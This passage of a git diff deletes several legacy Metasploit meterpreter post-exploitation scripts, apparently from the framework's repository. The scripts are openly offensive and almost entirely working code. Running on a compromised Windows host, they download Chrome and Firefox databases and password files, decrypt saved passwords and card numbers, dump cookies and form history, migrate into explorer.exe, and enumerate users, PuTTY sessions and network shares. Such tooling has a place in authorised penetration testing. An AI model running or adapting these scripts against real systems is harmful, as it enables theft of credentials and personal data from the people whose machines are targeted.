-      f.write(rows.map { |e| e.values.map(&:inspect).join("\t") }.join("\n"))
134
-    end
135
-  end
136
-end
137
-
138
-def process_files(username)
139
-  @chrome_files.each do |item|
140
-    in_file = File.join(@log_dir, Rex::FileUtils.clean_path(username), item[:in_file])
141
-    out_file = File.join(@log_dir, Rex::FileUtils.clean_path(username), item[:out_file])
142
-    if item[:sql]
143
-      db = SQLite3::Database.new(in_file)
144
-      columns, *rows = db.execute2(item[:sql])
145
-      db.close
146
-      rows.map! do |row|
147
-        res = Hash[*columns.zip(row).flatten]
148
-        if item[:encrypted_fields] && client.sys.config.getuid != "NT AUTHORITY\\SYSTEM"
149
-          if @host_info['Architecture'] !~ /x64/
150
-            item[:encrypted_fields].each do |field|
151
-              print_good("decrypting field '#{field}'...")
152
-              res[field + "_decrypted"] = decrypt_data(res[field])
153
-            end
154
-          else
155
-            print_error("Can not decrypt #{item[:out_file]}, decryption only supported in 32bit OS")
156
-          end
157
-        end
158
-        res
159
-      end
160
-      if rows.length > 0
161
-        print_status("writing output '#{item[:out_file]}'...")
162
-        write_output(out_file, rows)
163
-      else
164
-        print_status("no '#{item[:out_file]}' data found in file '#{item[:in_file]}'")
165
-      end
166
-    else
167
-      ::FileUtils.cp(in_file, out_file)
168
-    end
169
-  end
170
-end
171
-
172
-def extract_data(username)
173
-  chrome_path = @profiles_path + "\\" + username + @data_path
174
-  begin
175
-    client.fs.file.stat(chrome_path)
176
-  rescue
177
-    print_status("no files found for user '#{username}'")
178
-    return false
179
-  end
180
-
181
-  @chrome_files.map{ |e| e[:in_file] }.uniq.each do |f|
182
-    remote_path = chrome_path + '\\' + f
183
-    local_path = File.join(@log_dir, Rex::FileUtils.clean_path(username), f)
184
-    print_status("downloading file #{f} to '#{local_path}'...")
185
-    client.fs.file.download_file(local_path, remote_path)
186
-  end
187
-  return true
188
-end
189
-
190
-if @migrate
191
-  current_pid = client.sys.process.open.pid
192
-  target_pid = client.sys.process["explorer.exe"]
193
-  if target_pid != current_pid
194
-    @old_pid = current_pid
195
-    print_status("current PID is #{current_pid}. migrating into explorer.exe, PID=#{target_pid}...")
196
-    client.core.migrate(target_pid)
197
-    print_status("done.")
198
-  end
199
-end
200
-
201
-host = session.session_host
202
-@log_dir = File.join(Msf::Config.log_directory, "scripts", "enum_chrome", Rex::FileUtils.clean_path(@host_info['Computer']), Time.now.strftime("%Y%m%d.%H%M"))
203
-::FileUtils.mkdir_p(@log_dir)
204
-
205
-sysdrive = client.sys.config.getenv('SYSTEMDRIVE')
206
-os = @host_info['OS']
207
-if os =~ /(Windows 7|2008|Vista)/
208
-  @profiles_path = sysdrive + "\\Users\\"
209
-  @data_path = "\\AppData\\Local\\Google\\Chrome\\User Data\\Default"
210
-elsif os =~ /(2000|NET|XP)/
211
-  @profiles_path = sysdrive + "\\Documents and Settings\\"
212
-  @data_path = "\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default"
213
-end
214
-
215
-usernames = []
216
-
217
-uid = client.sys.config.getuid
218
-
219
-if is_system?
220
-  print_status "running as SYSTEM, extracting user list..."
221
-  print_status "(decryption of passwords and credit card numbers will not be possible)"
222
-  client.fs.dir.foreach(@profiles_path) do |u|
223
-    usernames << u if u !~ /^(\.|\.\.|All Users|Default|Default User|Public|desktop.ini|LocalService|NetworkService)$/
224
-  end
225
-  print_status "users found: #{usernames.join(", ")}"
226
-else
227
-  print_status "running as user '#{uid}'..."
228
-  usernames << client.sys.config.getenv('USERNAME')
229
-  prepare_railgun
230
-end
231
-
232
-usernames.each do |u|
233
-  print_status("extracting data for user '#{u}'...")
234
-  success = extract_data(u)
235
-  process_files(u) if success
236
-end
237
-
238
-if @migrate && @old_pid
239
-  print_status("migrating back into PID=#{@old_pid}...")
240
-  client.core.migrate(@old_pid)
241
-  print_status("done.")
242
-end
243
-
244
-raise Rex::Script::Completed

+ 0
- 292
scripts/meterpreter/enum_firefox.rb View File

@@ -1,292 +0,0 @@
1
-##
2
-# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
3
-# If you'd like to imporve this script, please try to port it as a post
4
-# module instead. Thank you.
5
-##
6
-
7
-
8
-#
9
-# Author: Carlos Perez at carlos_perez[at]darkoperator.com
10
-#-------------------------------------------------------------------------------
11
-################## Variable Declarations ##################
12
-require 'sqlite3'
13
-@client = client
14
-kill_frfx = false
15
-host,port = session.session_host, session.session_port
16
-# Create Filename info to be appended to downloaded files
17
-filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
18
-
19
-# Create a directory for the logs
20
-@logs = ::File.join(Msf::Config.config_directory, 'logs',"scripts", 'enum_firefox', host + filenameinfo )
21
-
22
-# logfile name
23
-logfile = @logs + "/" + host + filenameinfo + ".txt"
24
-notusrs = [
25
-  "Default",
26
-  "Default User",
27
-  "Public",
28
-  "LocalService",
29
-  "NetworkService",
30
-  "All Users"
31
-]
32
-#-------------------------------------------------------------------------------
33
-#Function for getting Firefox SQLite DB's
34
-def frfxplacesget(path,usrnm)
35
-  # Create the log
36
-  ::FileUtils.mkdir_p(@logs)
37
-  @client.fs.dir.foreach(path) {|x|
38
-    next if x =~ /^(\.|\.\.)$/
39
-    fullpath = path + '\\' + x
40
-    if @client.fs.file.stat(fullpath).directory?
41
-      frfxplacesget(fullpath,usrnm)
42
-    elsif fullpath =~ /(formhistory.sqlite|cookies.sqlite|places.sqlite|search.sqlite)/i
43
-      dst = x
44
-      dst = @logs + ::File::Separator + usrnm + dst
45
-      print_status("\tDownloading Firefox Database file #{x} to '#{dst}'")
46
-      @client.fs.file.download_file(dst, fullpath)
47
-    end
48
-  }
49
-
50
-end
51
-#-------------------------------------------------------------------------------
52
-#Function for processing the Firefox sqlite DB's
53
-def frfxdmp(usrnm)
54
-  sitesvisited = []
55
-  dnldsmade = []
56
-  bkmrks = []
57
-  cookies = []
58
-  formvals = ''
59
-  searches = ''
60
-  results = ''
61
-  placesdb = @logs + ::File::Separator + usrnm + "places.sqlite"
62
-  formdb = @logs + ::File::Separator + usrnm + "formhistory.sqlite"
63
-  searchdb = @logs + ::File::Separator + usrnm + "search.sqlite"
64
-  cookiesdb = @logs + ::File::Separator + usrnm + "cookies.sqlite"
65
-  bookmarks = @logs + ::File::Separator + usrnm + "_bookmarks.txt"
66
-  download_list = @logs + ::File::Separator + usrnm + "_download_list.txt"
67
-  url_history = @logs + ::File::Separator + usrnm + "_history.txt"
68
-  form_history = @logs + ::File::Separator + usrnm + "_form_history.txt"
69
-  search_history = @logs + ::File::Separator + usrnm + "_search_history.txt"
70
-  begin
71
-    print_status("\tGetting Firefox Bookmarks for #{usrnm}")
72
-    db = SQLite3::Database.new(placesdb)
73
-    #print_status("\tProcessing #{placesdb}")
74
-
75
-    db.execute('select a.url from moz_places a, moz_bookmarks b, '+
76
-      'moz_bookmarks_roots c where a.id=b.fk and parent=2'+
77
-      ' and folder_id=2 and a.hidden=0') do |row|
78
-      bkmrks << row
79
-    end
80
-    print_status("\tSaving to #{bookmarks}")
81
-    if bkmrks.length != 0
82
-      bkmrks.each do |b|
83
-        file_local_write(bookmarks,"\t#{b.to_s}\n")
84
-      end
85
-    else
86
-      print_status("\tIt appears that there are no bookmarks for this account")
87
-    end
88
-  rescue::Exception => e
89
-    print_status("The following Error was encountered: #{e.class} #{e}")
90
-  end
91
-  #--------------------------------------------------------------------------
92
-  begin
93
-    print_status("\tGetting list of Downloads using Firefox made by #{usrnm}")
94
-    db.execute('SELECT url FROM moz_places, moz_historyvisits ' +
95
-      'WHERE moz_places.id = moz_historyvisits.place_id '+
96
-      'AND visit_type = "7" ORDER by visit_date') do |row|
97
-      dnldsmade << row
98
-    end
99
-    print_status("\tSaving Download list to #{download_list}")
100
-    if dnldsmade.length != 0
101
-      dnldsmade.each do |d|
102
-        file_local_write(download_list,"\t#{d.to_s} \n")
103
-      end
104
-    else
105
-      print_status("\tIt appears that downloads where cleared for this account")
106
-    end
107
-  rescue::Exception => e
108
-    print_status("The following Error was encountered: #{e.class} #{e}")
109
-  end
110
-  #--------------------------------------------------------------------------
111
-  begin
112
-    print_status("\tGetting Firefox URL History for #{usrnm}")
113
-    db.execute('SELECT DISTINCT url FROM moz_places, moz_historyvisits ' +
114
-      'WHERE moz_places.id = moz_historyvisits.place_id ' +
115
-      'AND visit_type = "1" ORDER by visit_date' ) do |row|
116
-      sitesvisited << row
117
-    end
118
-    print_status("\tSaving URL History to #{url_history}")
119
-    if sitesvisited.length != 0
120
-      sitesvisited.each do |s|
121
-        file_local_write(url_history,"\t#{s.to_s}\n")
122
-      end
123
-    else
124
-      print_status("\tIt appears that Browser History has been cleared")
125
-    end
126
-    db.close
127
-  rescue::Exception => e
128
-    print_status("The following Error was encountered: #{e.class} #{e}")
129
-  end
130
-  #--------------------------------------------------------------------------
131
-  begin
132
-    print_status("\tGetting Firefox Form History for #{usrnm}")
133
-    db = SQLite3::Database.new(formdb)
134
-    #print_status("\tProcessing #{formdb}")
135
-    db.execute("SELECT fieldname,value FROM moz_formhistory") do |row|
136
-      formvals << "\tField: #{row[0]} Value: #{row[1]}\n"
137
-    end
138
-    print_status("\tSaving Firefox Form History to #{form_history}")
139
-    if formvals.length != 0
140
-      file_local_write(form_history,formvals)
141
-    else
142
-      print_status("\tIt appears that Form History has been cleared")
143
-    end
144
-    db.close
145
-  rescue::Exception => e
146
-    print_status("The following Error was encountered: #{e.class} #{e}")
147
-  end
148
-
149
-  begin
150
-    print_status("\tGetting Firefox Search History for #{usrnm}")
151
-    db = SQLite3::Database.new(searchdb)
152
-    #print_status("\tProcessing #{searchdb}")
153
-    db.execute("SELECT name,value FROM engine_data") do |row|
154
-      searches << "\tField: #{row[0]} Value: #{row[1]}\n"
155
-    end
156
-    print_status("\tSaving Firefox Search History to #{search_history}")
157
-    if searches.length != 0
158
-      file_local_write(search_history,searches)
159
-    else
160
-      print_status("\tIt appears that Search History has been cleared")
161
-    end
162
-    db.close
163
-  rescue::Exception => e
164
-    print_status("The following Error was encountered: #{e.class} #{e}")
165
-  end
166
-  # Create Directory for dumping Firefox cookies
167
-  ckfldr = ::File.join(@logs,"firefoxcookies_#{usrnm}")
168
-  ::FileUtils.mkdir_p(ckfldr)
169
-  db = SQLite3::Database.new(cookiesdb)
170
-  db.results_as_hash = true
171
-  print_status("\tGetting Firefox Cookies for #{usrnm}")
172
-  db.execute("SELECT * FROM moz_cookies;" ) do |item|
173
-    fd = ::File.new(ckfldr + ::File::Separator + item['id'].to_s + "_" + item['host'].to_s + ".txt", "w+")
174
-    fd.puts "Name: " + item['name'] + "\n"
175
-    fd.puts "Value: " + item['value'].to_s + "\n"
176
-    fd.puts "Host: " + item['host'] + "\n"
177
-    fd.puts "Path: " + item['path'] + "\n"
178
-    fd.puts "Expiry: " + item['expiry'].to_s + "\n"
179
-    fd.puts "lastAccessed: " + item['lastAccessed'].to_s + "\n"
180
-    fd.puts "isSecure: " + item['isSecure'].to_s + "\n"
181
-    fd.puts "isHttpOnly: " + item['isHttpOnly'].to_s + "\n"
182
-    fd.close
183
-  end
184
-  return results
185
-end
186
-#-------------------------------------------------------------------------------
187
-#Function for getting password files
188
-def frfxpswd(path,usrnm)
189
-  @client.fs.dir.foreach(path) {|x|
190
-    next if x =~ /^(\.|\.\.)$/
191
-    fullpath = path + '\\' + x
192
-
193
-    if @client.fs.file.stat(fullpath).directory?
194
-      frfxpswd(fullpath,usrnm)
195
-    elsif fullpath =~ /(cert8.db|signons.sqlite|signons3.txt|key3.db)/i
196
-      begin
197
-        dst = x
198
-        dst = @logs + ::File::Separator + usrnm + dst
199
-        print_status("\tDownloading Firefox Password file to '#{dst}'")
200
-        @client.fs.file.download_file(dst, fullpath)
201
-      rescue
202
-        print_error("\t******Failed to download file #{x}******")
203
-        print_error("\t******Browser could be running******")
204
-      end
205
-    end
206
-  }
207
-
208
-end
209
-#-------------------------------------------------------------------------------
210
-# Function for checking if Firefox is installed
211
-def frfxchk
212
-  found = false
213
-  registry_enumkeys("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall").each do |a|
214
-    if a =~ /Firefox/
215
-      print_status("Firefox was found on this system.")
216
-      found = true
217
-    end
218
-  end
219
-  return found
220
-end
221
-#-------------------------------------------------------------------------------
222
-#Function for executing all pilfering actions for Firefox
223
-def frfxpilfer(frfoxdbloc,session,logs,usrnm,logfile)
224
-  print_status("Getting Firefox information for user #{usrnm}")
225
-  frfxplacesget(frfoxdbloc,usrnm)
226
-  frfxpswd(frfoxdbloc,usrnm)
227
-  file_local_write(logfile,frfxdmp(usrnm))
228
-end
229
-
230
-# Function to kill Firefox if open
231
-def kill_firefox
232
-  print_status("Killing the Firefox Process if open...")
233
-  @client.sys.process.get_processes().each do |x|
234
-    if x['name'].downcase == "firefox.exe"
235
-      print_status("\tFirefox Process found #{x['name']} #{x['pid']}")
236
-      print_status("\tKilling process .....")
237
-      session.sys.process.kill(x['pid'])
238
-    end
239
-  end
240
-end
241
-####################### Options ###########################
242
-@@exec_opts = Rex::Parser::Arguments.new(
243
-  "-h" => [ false, "Help menu." ],
244
-  "-k" => [ false, "Kill Firefox processes before downloading databases for enumeration."]
245
-
246
-)
247
-@@exec_opts.parse(args) { |opt, idx, val|
248
-  case opt
249
-  when "-h"
250
-    print_line "Meterpreter Script for extracting Firefox Browser."
251
-    print_line(@@exec_opts.usage)
252
-    raise Rex::Script::Completed
253
-  when "-k"
254
-    kill_frfx = true
255
-  end
256
-}
257
-if client.platform =~ /win32|win64/
258
-  if frfxchk
259
-    user = @client.sys.config.getuid
260
-    if not is_system?
261
-      envs = @client.sys.config.getenvs('USERNAME', 'APPDATA')
262
-      usrname = envs['USERNAME']
263
-      db_path = envs['APPDATA'] + "\\Mozilla\\Firefox\\Profiles"
264
-      if kill_frfx
265
-        kill_firefox
266
-      end
267
-      print_status("Extracting Firefox data for user #{usrname}")
268
-      frfxpswd(db_path,usrname)
269
-      frfxplacesget(db_path,usrname)
270
-      frfxdmp(usrname)
271
-    else
272
-      registry_enumkeys("HKU").each do |sid|
273
-        if sid =~ /S-1-5-21-\d*-\d*-\d*-\d{4}$/
274
-          key_base = "HKU\\#{sid}"
275
-          usrname = Rex::FileUtils.clean_path(registry_getvaldata("#{key_base}\\Volatile Environment","USERNAME"))
276
-          db_path = registry_getvaldata("#{key_base}\\Volatile Environment","APPDATA") + "\\Mozilla\\Firefox\\Profiles"
277
-          if kill_frfx
278
-            kill_firefox
279
-          end
280
-          print_status("Extracting Firefox data for user #{usrname}")
281
-          frfxpswd(db_path,usrname)
282
-          frfxplacesget(db_path,usrname)
283
-          frfxdmp(usrname)
284
-        end
285
-      end
286
-    end
287
-
288
-  end
289
-else
290
-  print_error("This version of Meterpreter is not supported with this Script!")
291
-  raise Rex::Script::Completed
292
-end

+ 0
- 101
scripts/meterpreter/enum_logged_on_users.rb View File

@@ -1,101 +0,0 @@
1
-##
2
-# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
3
-# If you'd like to imporve this script, please try to port it as a post
4
-# module instead. Thank you.
5
-##
6
-
7
-
8
-# Author: Carlos Perez at carlos_perez[at]darkoperator.com
9
-#-------------------------------------------------------------------------------
10
-################## Variable Declarations ##################
11
-@client = client
12
-#-------------------------------------------------------------------------------
13
-
14
-######################## Functions ########################
15
-def ls_logged
16
-  sids = []
17
-  sids << registry_enumkeys("HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList")
18
-  tbl = Rex::Text::Table.new(
19
-      'Header'  => "Logged Users",
20
-      'Indent'  => 1,
21
-      'Columns' =>
22
-        [
23
-          "SID",
24
-          "Profile Path"
25
-        ])
26
-  sids.flatten.each do |sid|
27
-    profile_path = registry_getvaldata("HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList\\#{sid}","ProfileImagePath")
28
-    tbl << [sid,profile_path]
29
-  end
30
-  print_line("\n" + tbl.to_s + "\n")
31
-end
32
-
33
-def ls_current
34
-  key_base, username = "",""
35
-  tbl = Rex::Text::Table.new(
36
-      'Header'  => "Current Logged Users",
37
-      'Indent'  => 1,
38
-      'Columns' =>
39
-        [
40
-          "SID",
41
-          "User"
42
-        ])
43
-  registry_enumkeys("HKU").each do |sid|
44
-    case sid
45
-    when "S-1-5-18"
46
-      username = "SYSTEM"
47
-      tbl << [sid,username]
48
-    when "S-1-5-19"
49
-      username = "Local Service"
50
-      tbl << [sid,username]
51
-    when "S-1-5-20"
52
-      username = "Network Service"
53
-      tbl << [sid,username]
54
-    else
55
-      if sid =~ /S-1-5-21-\d*-\d*-\d*-\d*$/
56
-      key_base = "HKU\\#{sid}"
57
-      os = @client.sys.config.sysinfo['OS']
58
-      if os =~ /(Windows 7|2008|Vista)/
59
-        username = registry_getvaldata("#{key_base}\\Volatile Environment","USERNAME")
60
-      elsif os =~ /(2000|NET|XP)/
61
-        appdata_var = registry_getvaldata("#{key_base}\\Volatile Environment","APPDATA")
62
-        username = ''
63
-        if appdata_var =~ /^\w\:\D*\\(\D*)\\\D*$/
64
-          username = $1
65
-        end
66
-      end
67
-      tbl << [sid,username]
68
-      end
69
-    end
70
-  end
71
-  print_line("\n" + tbl.to_s + "\n")
72
-end
73
-#-------------------------------------------------------------------------------
74
-####################### Options ###########################
75
-@@exec_opts = Rex::Parser::Arguments.new(
76
-  "-h" => [ false, "Help menu." ],
77
-  "-l" => [ false, "List SID's of users who have loged in to the host." ],
78
-  "-c" => [ false, "List SID's of currently loged on users." ]
79
-  )
80
-@@exec_opts.parse(args) { |opt, idx, val|
81
-  case opt
82
-  when "-h"
83
-    print_line "Meterpreter Script for enumerating Current logged users and users that have loged in to the system."
84
-    print_line(@@exec_opts.usage)
85
-    raise Rex::Script::Completed
86
-  when "-l"
87
-    ls_logged
88
-  when "-c"
89
-    ls_current
90
-  end
91
-}
92
-if client.platform =~ /win32|win64/
93
-  if args.length == 0
94
-    print_line "Meterpreter Script for enumerating Current logged users and users that have loged in to the system."
95
-    print_line(@@exec_opts.usage)
96
-    raise Rex::Script::Completed
97
-  end
98
-else
99
-  print_error("This version of Meterpreter is not supported with this Script!")
100
-  raise Rex::Script::Completed
101
-end

+ 0
- 132
scripts/meterpreter/enum_powershell_env.rb View File

@@ -1,132 +0,0 @@
1
-##
2
-# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
3
-# If you'd like to imporve this script, please try to port it as a post
4
-# module instead. Thank you.
5
-##
6
-
7
-
8
-#Meterpreter script for enumerating Microsoft Powershell settings.
9
-#Provided by Carlos Perez at carlos_perez[at]darkoperator[dot]com
10
-@client = client
11
-
12
-@@exec_opts = Rex::Parser::Arguments.new(
13
-  "-h" => [ false,"Help menu." ]
14
-)
15
-
16
-@@exec_opts.parse(args) { |opt, idx, val|
17
-  case opt
18
-  when "-h"
19
-    print_line("enum_scripting_env -- Enumerates PowerShell and WSH Configurations")
20
-    print_line("USAGE: run enum_scripting_env")
21
-    print_line(@@exec_opts.usage)
22
-    raise Rex::Script::Completed
23
-  end
24
-}
25
-#Support Functions
26
-#-------------------------------------------------------------------------------
27
-def enum_users
28
-  os = @client.sys.config.sysinfo['OS']
29
-  users = []
30
-  user = @client.sys.config.getuid
31
-  path4users = ""
32
-  sysdrv = @client.sys.config.getenv('SystemDrive')
33
-
34
-  if os =~ /Windows 7|Vista|2008/
35
-    path4users = sysdrv + "\\Users\\"
36
-    profilepath = "\\Documents\\WindowsPowerShell\\"
37
-  else
38
-    path4users = sysdrv + "\\Documents and Settings\\"
39
-    profilepath = "\\My Documents\\WindowsPowerShell\\"
40
-  end
41
-
42
-  if is_system?
43
-    print_status("Running as SYSTEM extracting user list..")
44
-    @client.fs.dir.foreach(path4users) do |u|
45
-      userinfo = {}
46
-      next if u =~ /^(\.|\.\.|All Users|Default|Default User|Public|desktop.ini|LocalService|NetworkService)$/
47
-      userinfo['username'] = u
48
-      userinfo['userappdata'] = path4users + u + profilepath
49
-      users << userinfo
50
-    end
51
-  else
52
-    userinfo = {}
53
-    uservar = @client.sys.config.getenv('USERNAME')
54
-    userinfo['username'] = uservar
55
-    userinfo['userappdata'] = path4users + uservar + profilepath
56
-    users << userinfo
57
-  end
58
-  return users
59
-end
60
-
61
-
62
-
63
-#-------------------------------------------------------------------------------
64
-def enum_powershell
65
-  #Check if PowerShell is Installed
66
-  if registry_enumkeys("HKLM\\SOFTWARE\\Microsoft\\").include?("PowerShell")
67
-    print_status("Powershell is Installed on this system.")
68
-    powershell_version = registry_getvaldata("HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1\\PowerShellEngine","PowerShellVersion")
69
-    print_status("Version: #{powershell_version}")
70
-    #Get PowerShell Execution Policy
71
-    begin
72
-      powershell_policy = registry_getvaldata("HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell","ExecutionPolicy")
73
-    rescue
74
-      powershell_policy = "Restricted"
75
-    end
76
-    print_status("Execution Policy: #{powershell_policy}")
77
-    powershell_path = registry_getvaldata("HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell","Path")
78
-    print_status("Path: #{powershell_path}")
79
-    if registry_enumkeys("HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1").include?("PowerShellSnapIns")
80
-      print_status("Powershell Snap-Ins:")
81
-      registry_enumkeys("HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1\\PowerShellSnapIns").each do |si|
82
-        print_status("\tSnap-In: #{si}")
83
-        registry_enumvals("HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1\\PowerShellSnapIns\\#{si}").each do |v|
84
-          print_status("\t\t#{v}: #{registry_getvaldata("HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1\\PowerShellSnapIns\\#{si}",v)}")
85
-        end
86
-      end
87
-    else
88
-      print_status("No PowerShell Snap-Ins are installed")
89
-
90
-    end
91
-    if powershell_version =~ /2./
92
-      print_status("Powershell Modules:")
93
-      powershell_module_path = @client.sys.config.getenv('PSModulePath')
94
-      @client.fs.dir.foreach(powershell_module_path) do |m|
95
-        next if m =~ /^(\.|\.\.)$/
96
-        print_status("\t#{m}")
97
-      end
98
-    end
99
-    tmpout = []
100
-    print_status("Checking if users have Powershell profiles")
101
-    enum_users.each do |u|
102
-      print_status("Checking #{u['username']}")
103
-      begin
104
-      @client.fs.dir.foreach(u["userappdata"]) do |p|
105
-        next if p =~ /^(\.|\.\.)$/
106
-        if p =~ /Microsoft.PowerShell_profile.ps1/
107
-          ps_profile = session.fs.file.new("#{u["userappdata"]}Microsoft.PowerShell_profile.ps1", "rb")
108
-          until ps_profile.eof?
109
-            tmpout << ps_profile.read
110
-          end
111
-          ps_profile.close
112
-          if tmpout.length == 1
113
-            print_status("Profile for #{u["username"]} not empty, it contains:")
114
-            tmpout.each do |l|
115
-              print_status("\t#{l.strip}")
116
-            end
117
-          end
118
-        end
119
-      end
120
-      rescue
121
-      end
122
-    end
123
-
124
-
125
-  end
126
-end
127
-if client.platform =~ /win32|win64/
128
-  enum_powershell
129
-else
130
-  print_error("This version of Meterpreter is not supported with this Script!")
131
-  raise Rex::Script::Completed
132
-end

+ 0
- 104
scripts/meterpreter/enum_putty.rb View File

@@ -1,104 +0,0 @@
1
-##
2
-# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
3
-# If you'd like to imporve this script, please try to port it as a post
4
-# module instead. Thank you.
5
-##
6
-
7
-
8
-#
9
-# Meterpreter script for enumerating putty connections
10
-# Provided by Carlos Perez at carlos_perez[at]darkoperator[dot]com
11
-#
12
-@client = client
13
-#Options and Option Parsing
14
-opts = Rex::Parser::Arguments.new(
15
-  "-h" => [ false, "Help menu." ]
16
-)
17
-
18
-opts.parse(args) { |opt, idx, val|
19
-  case opt
20
-  when "-h"
21
-    print_line "Meterpreter Script for enumerating Putty Configuration."
22
-    print_line(opts.usage)
23
-    raise Rex::Script::Completed
24
-  end
25
-}
26
-
27
-def hkcu_base
28
-  key_base = []
29
-
30
-  if not is_system?
31
-    key_base << "HKCU"
32
-  else
33
-    key = "HKU\\"
34
-    root_key, base_key = @client.sys.registry.splitkey(key)
35
-    open_key = @client.sys.registry.open_key(root_key, base_key)
36
-    keys = open_key.enum_key
37
-    keys.each do |k|
38
-      if k =~ /S-1-5-21-\d*-\d*-\d*-\d*$/
39
-        key_base << "HKU\\#{k}"
40
-      end
41
-    end
42
-  end
43
-  return key_base
44
-end
45
-def check_putty(reg_key_base)
46
-  installed = false
47
-  app_list = []
48
-  app_list = registry_enumkeys("#{reg_key_base}\\Software")
49
-  os = @client.sys.config.sysinfo['OS']
50
-  if os =~ /(Windows 7|2008|Vista)/
51
-    username_profile = registry_getvaldata("#{reg_key_base}\\Volatile Environment","USERNAME")
52
-  elsif os =~ /(2000|NET|XP)/
53
-    appdata_var = registry_getvaldata("#{reg_key_base}\\Volatile Environment","APPDATA")
54
-    username_profile = appdata_var.scan(/^\w\:\D*\\(\D*)\\\D*$/)
55
-  end
56
-  if app_list.index("SimonTatham")
57
-    print_status("Putty Installed for #{username_profile}")
58
-    installed = true
59
-  end
60
-  return installed
61
-end
62
-
63
-def enum_known_ssh_hosts(reg_key_base)
64
-  print_status("Saved SSH Server Public Keys:")
65
-  registry_enumvals("#{reg_key_base}\\Software\\SimonTatham\\PuTTY\\SshHostKeys").each do |host|
66
-    print_status("\t#{host}")
67
-  end
68
-end
69
-
70
-def enum_saved_sessions(reg_key_base)
71
-  saved_sessions = []
72
-  sessions_protocol = ""
73
-  sessions_key = "#{reg_key_base}\\Software\\SimonTatham\\PuTTY\\Sessions"
74
-  saved_sessions = registry_enumkeys(sessions_key)
75
-  if saved_sessions.length > 0
76
-    saved_sessions.each do |saved_session|
77
-      print_status("Session #{saved_session}:")
78
-      sessions_protocol = registry_getvaldata(sessions_key+"\\"+saved_session,"Protocol")
79
-      if sessions_protocol =~ /ssh/
80
-        print_status("\tProtocol: SSH")
81
-        print_status("\tHostname: #{registry_getvaldata(sessions_key+"\\"+saved_session,"HostName")}")
82
-        print_status("\tUsername: #{registry_getvaldata(sessions_key+"\\"+saved_session,"UserName")}")
83
-        print_status("\tPublic Key: #{registry_getvaldata(sessions_key+"\\"+saved_session,"PublicKeyFile")}")
84
-      elsif sessions_protocol =~ /serial/
85
-        print_status("\tProtocol: Serial")
86
-        print_status("\tSerial Port: #{registry_getvaldata(sessions_key+"\\"+saved_session,"SerialLine")}")
87
-        print_status("\tSpeed: #{registry_getvaldata(sessions_key+"\\"+saved_session,"SerialSpeed")}")
88
-        print_status("\tData Bits: #{registry_getvaldata(sessions_key+"\\"+saved_session,"SerialDataBits")}")
89
-        print_status("\tFlow Control: #{registry_getvaldata(sessions_key+"\\"+saved_session,"SerialFlowControl")}")
90
-      end
91
-    end
92
-  end
93
-end
94
-if client.platform =~ /win32|win64/
95
-  hkcu_base.each do |hkb|
96
-    if check_putty(hkb)
97
-      enum_known_ssh_hosts(hkb)
98
-      enum_saved_sessions(hkb)
99
-    end
100
-  end
101
-else
102
-  print_error("This version of Meterpreter is not supported with this Script!")
103
-  raise Rex::Script::Completed
104
-end

+ 0
- 124
scripts/meterpreter/enum_shares.rb View File

@@ -1,124 +0,0 @@
1
-##
2
-# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
3
-# If you'd like to imporve this script, please try to port it as a post
4
-# module instead. Thank you.
5
-##
6
-
7
-
8
-
9
-# Author: Carlos Perez at carlos_perez[at]darkoperator.com
10
-#-------------------------------------------------------------------------------
11
-################## Variable Declarations ##################
12
-opts = Rex::Parser::Arguments.new(
13
-  "-h" => [ false, "Help menu." ]
14
-  )
15
-
16
-opts.parse(args) { |opt, idx, val|
17
-  case opt
18
-  when "-h"
19
-    print_line "Meterpreter Script for Enumerating Shares Offered, History of Mounted Shares,"
20
-    print_line "History of UNC Paths entered in Run Dialog."
21
-    print_line(opts.usage)
22
-    raise Rex::Script::Completed
23
-  end
24
-}
25
-
26
-# Function for enumerating recent mapped drives on target machine
27
-def enum_recent_mounts(base_key)
28
-  recent_mounts = []
29
-  partial_path = base_key + '\Software\\Microsoft\Windows\CurrentVersion\Explorer'
30
-  full_path = "#{partial_path}\\Map Network Drive MRU"
31
-  explorer_keys = registry_enumkeys(partial_path)
32
-  if explorer_keys.include?("Map Network Drive MRU")
33
-    registry_enumvals(full_path).each do |k|
34
-      if not k =~ /MRUList/
35
-        recent_mounts << registry_getvaldata(full_path,k)
36
-      end
37
-    end
38
-  end
39
-  return recent_mounts
40
-end
41
-
42
-# Function for enumerating UNC Paths entered in run dialog box
43
-def enum_run_unc(base_key)
44
-  unc_paths = []
45
-  full_path = base_key + '\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU'
46
-  registry_enumvals(full_path).each do |k|
47
-    if k =~ /./
48
-      run_entrie = registry_getvaldata(full_path,k)
49
-      unc_paths << run_entrie if run_entrie =~ /^\\\\/
50
-    end
51
-  end
52
-  return unc_paths
53
-end
54
-
55
-def enum_conf_shares()
56
-  target_os = client.sys.config.sysinfo['OS']
57
-  if target_os =~ /Windows 7|Vista|2008/
58
-    shares_key = 'HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\LanmanServer\\Shares'
59
-  else
60
-    shares_key = 'HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\lanmanserver\\Shares'
61
-  end
62
-  shares = registry_enumvals(shares_key)
63
-  if shares.length > 0
64
-    print_status()
65
-    print_status("The following shares where found:")
66
-    shares.each do |s|
67
-      share_info = registry_getvaldata(shares_key,s).split("\000")
68
-      print_status("\tName: #{s}")
69
-      share_info.each do |e|
70
-        name,val = e.split("=")
71
-        print_status("\t#{name}: #{val}") if name =~ /Path|Type/
72
-      end
73
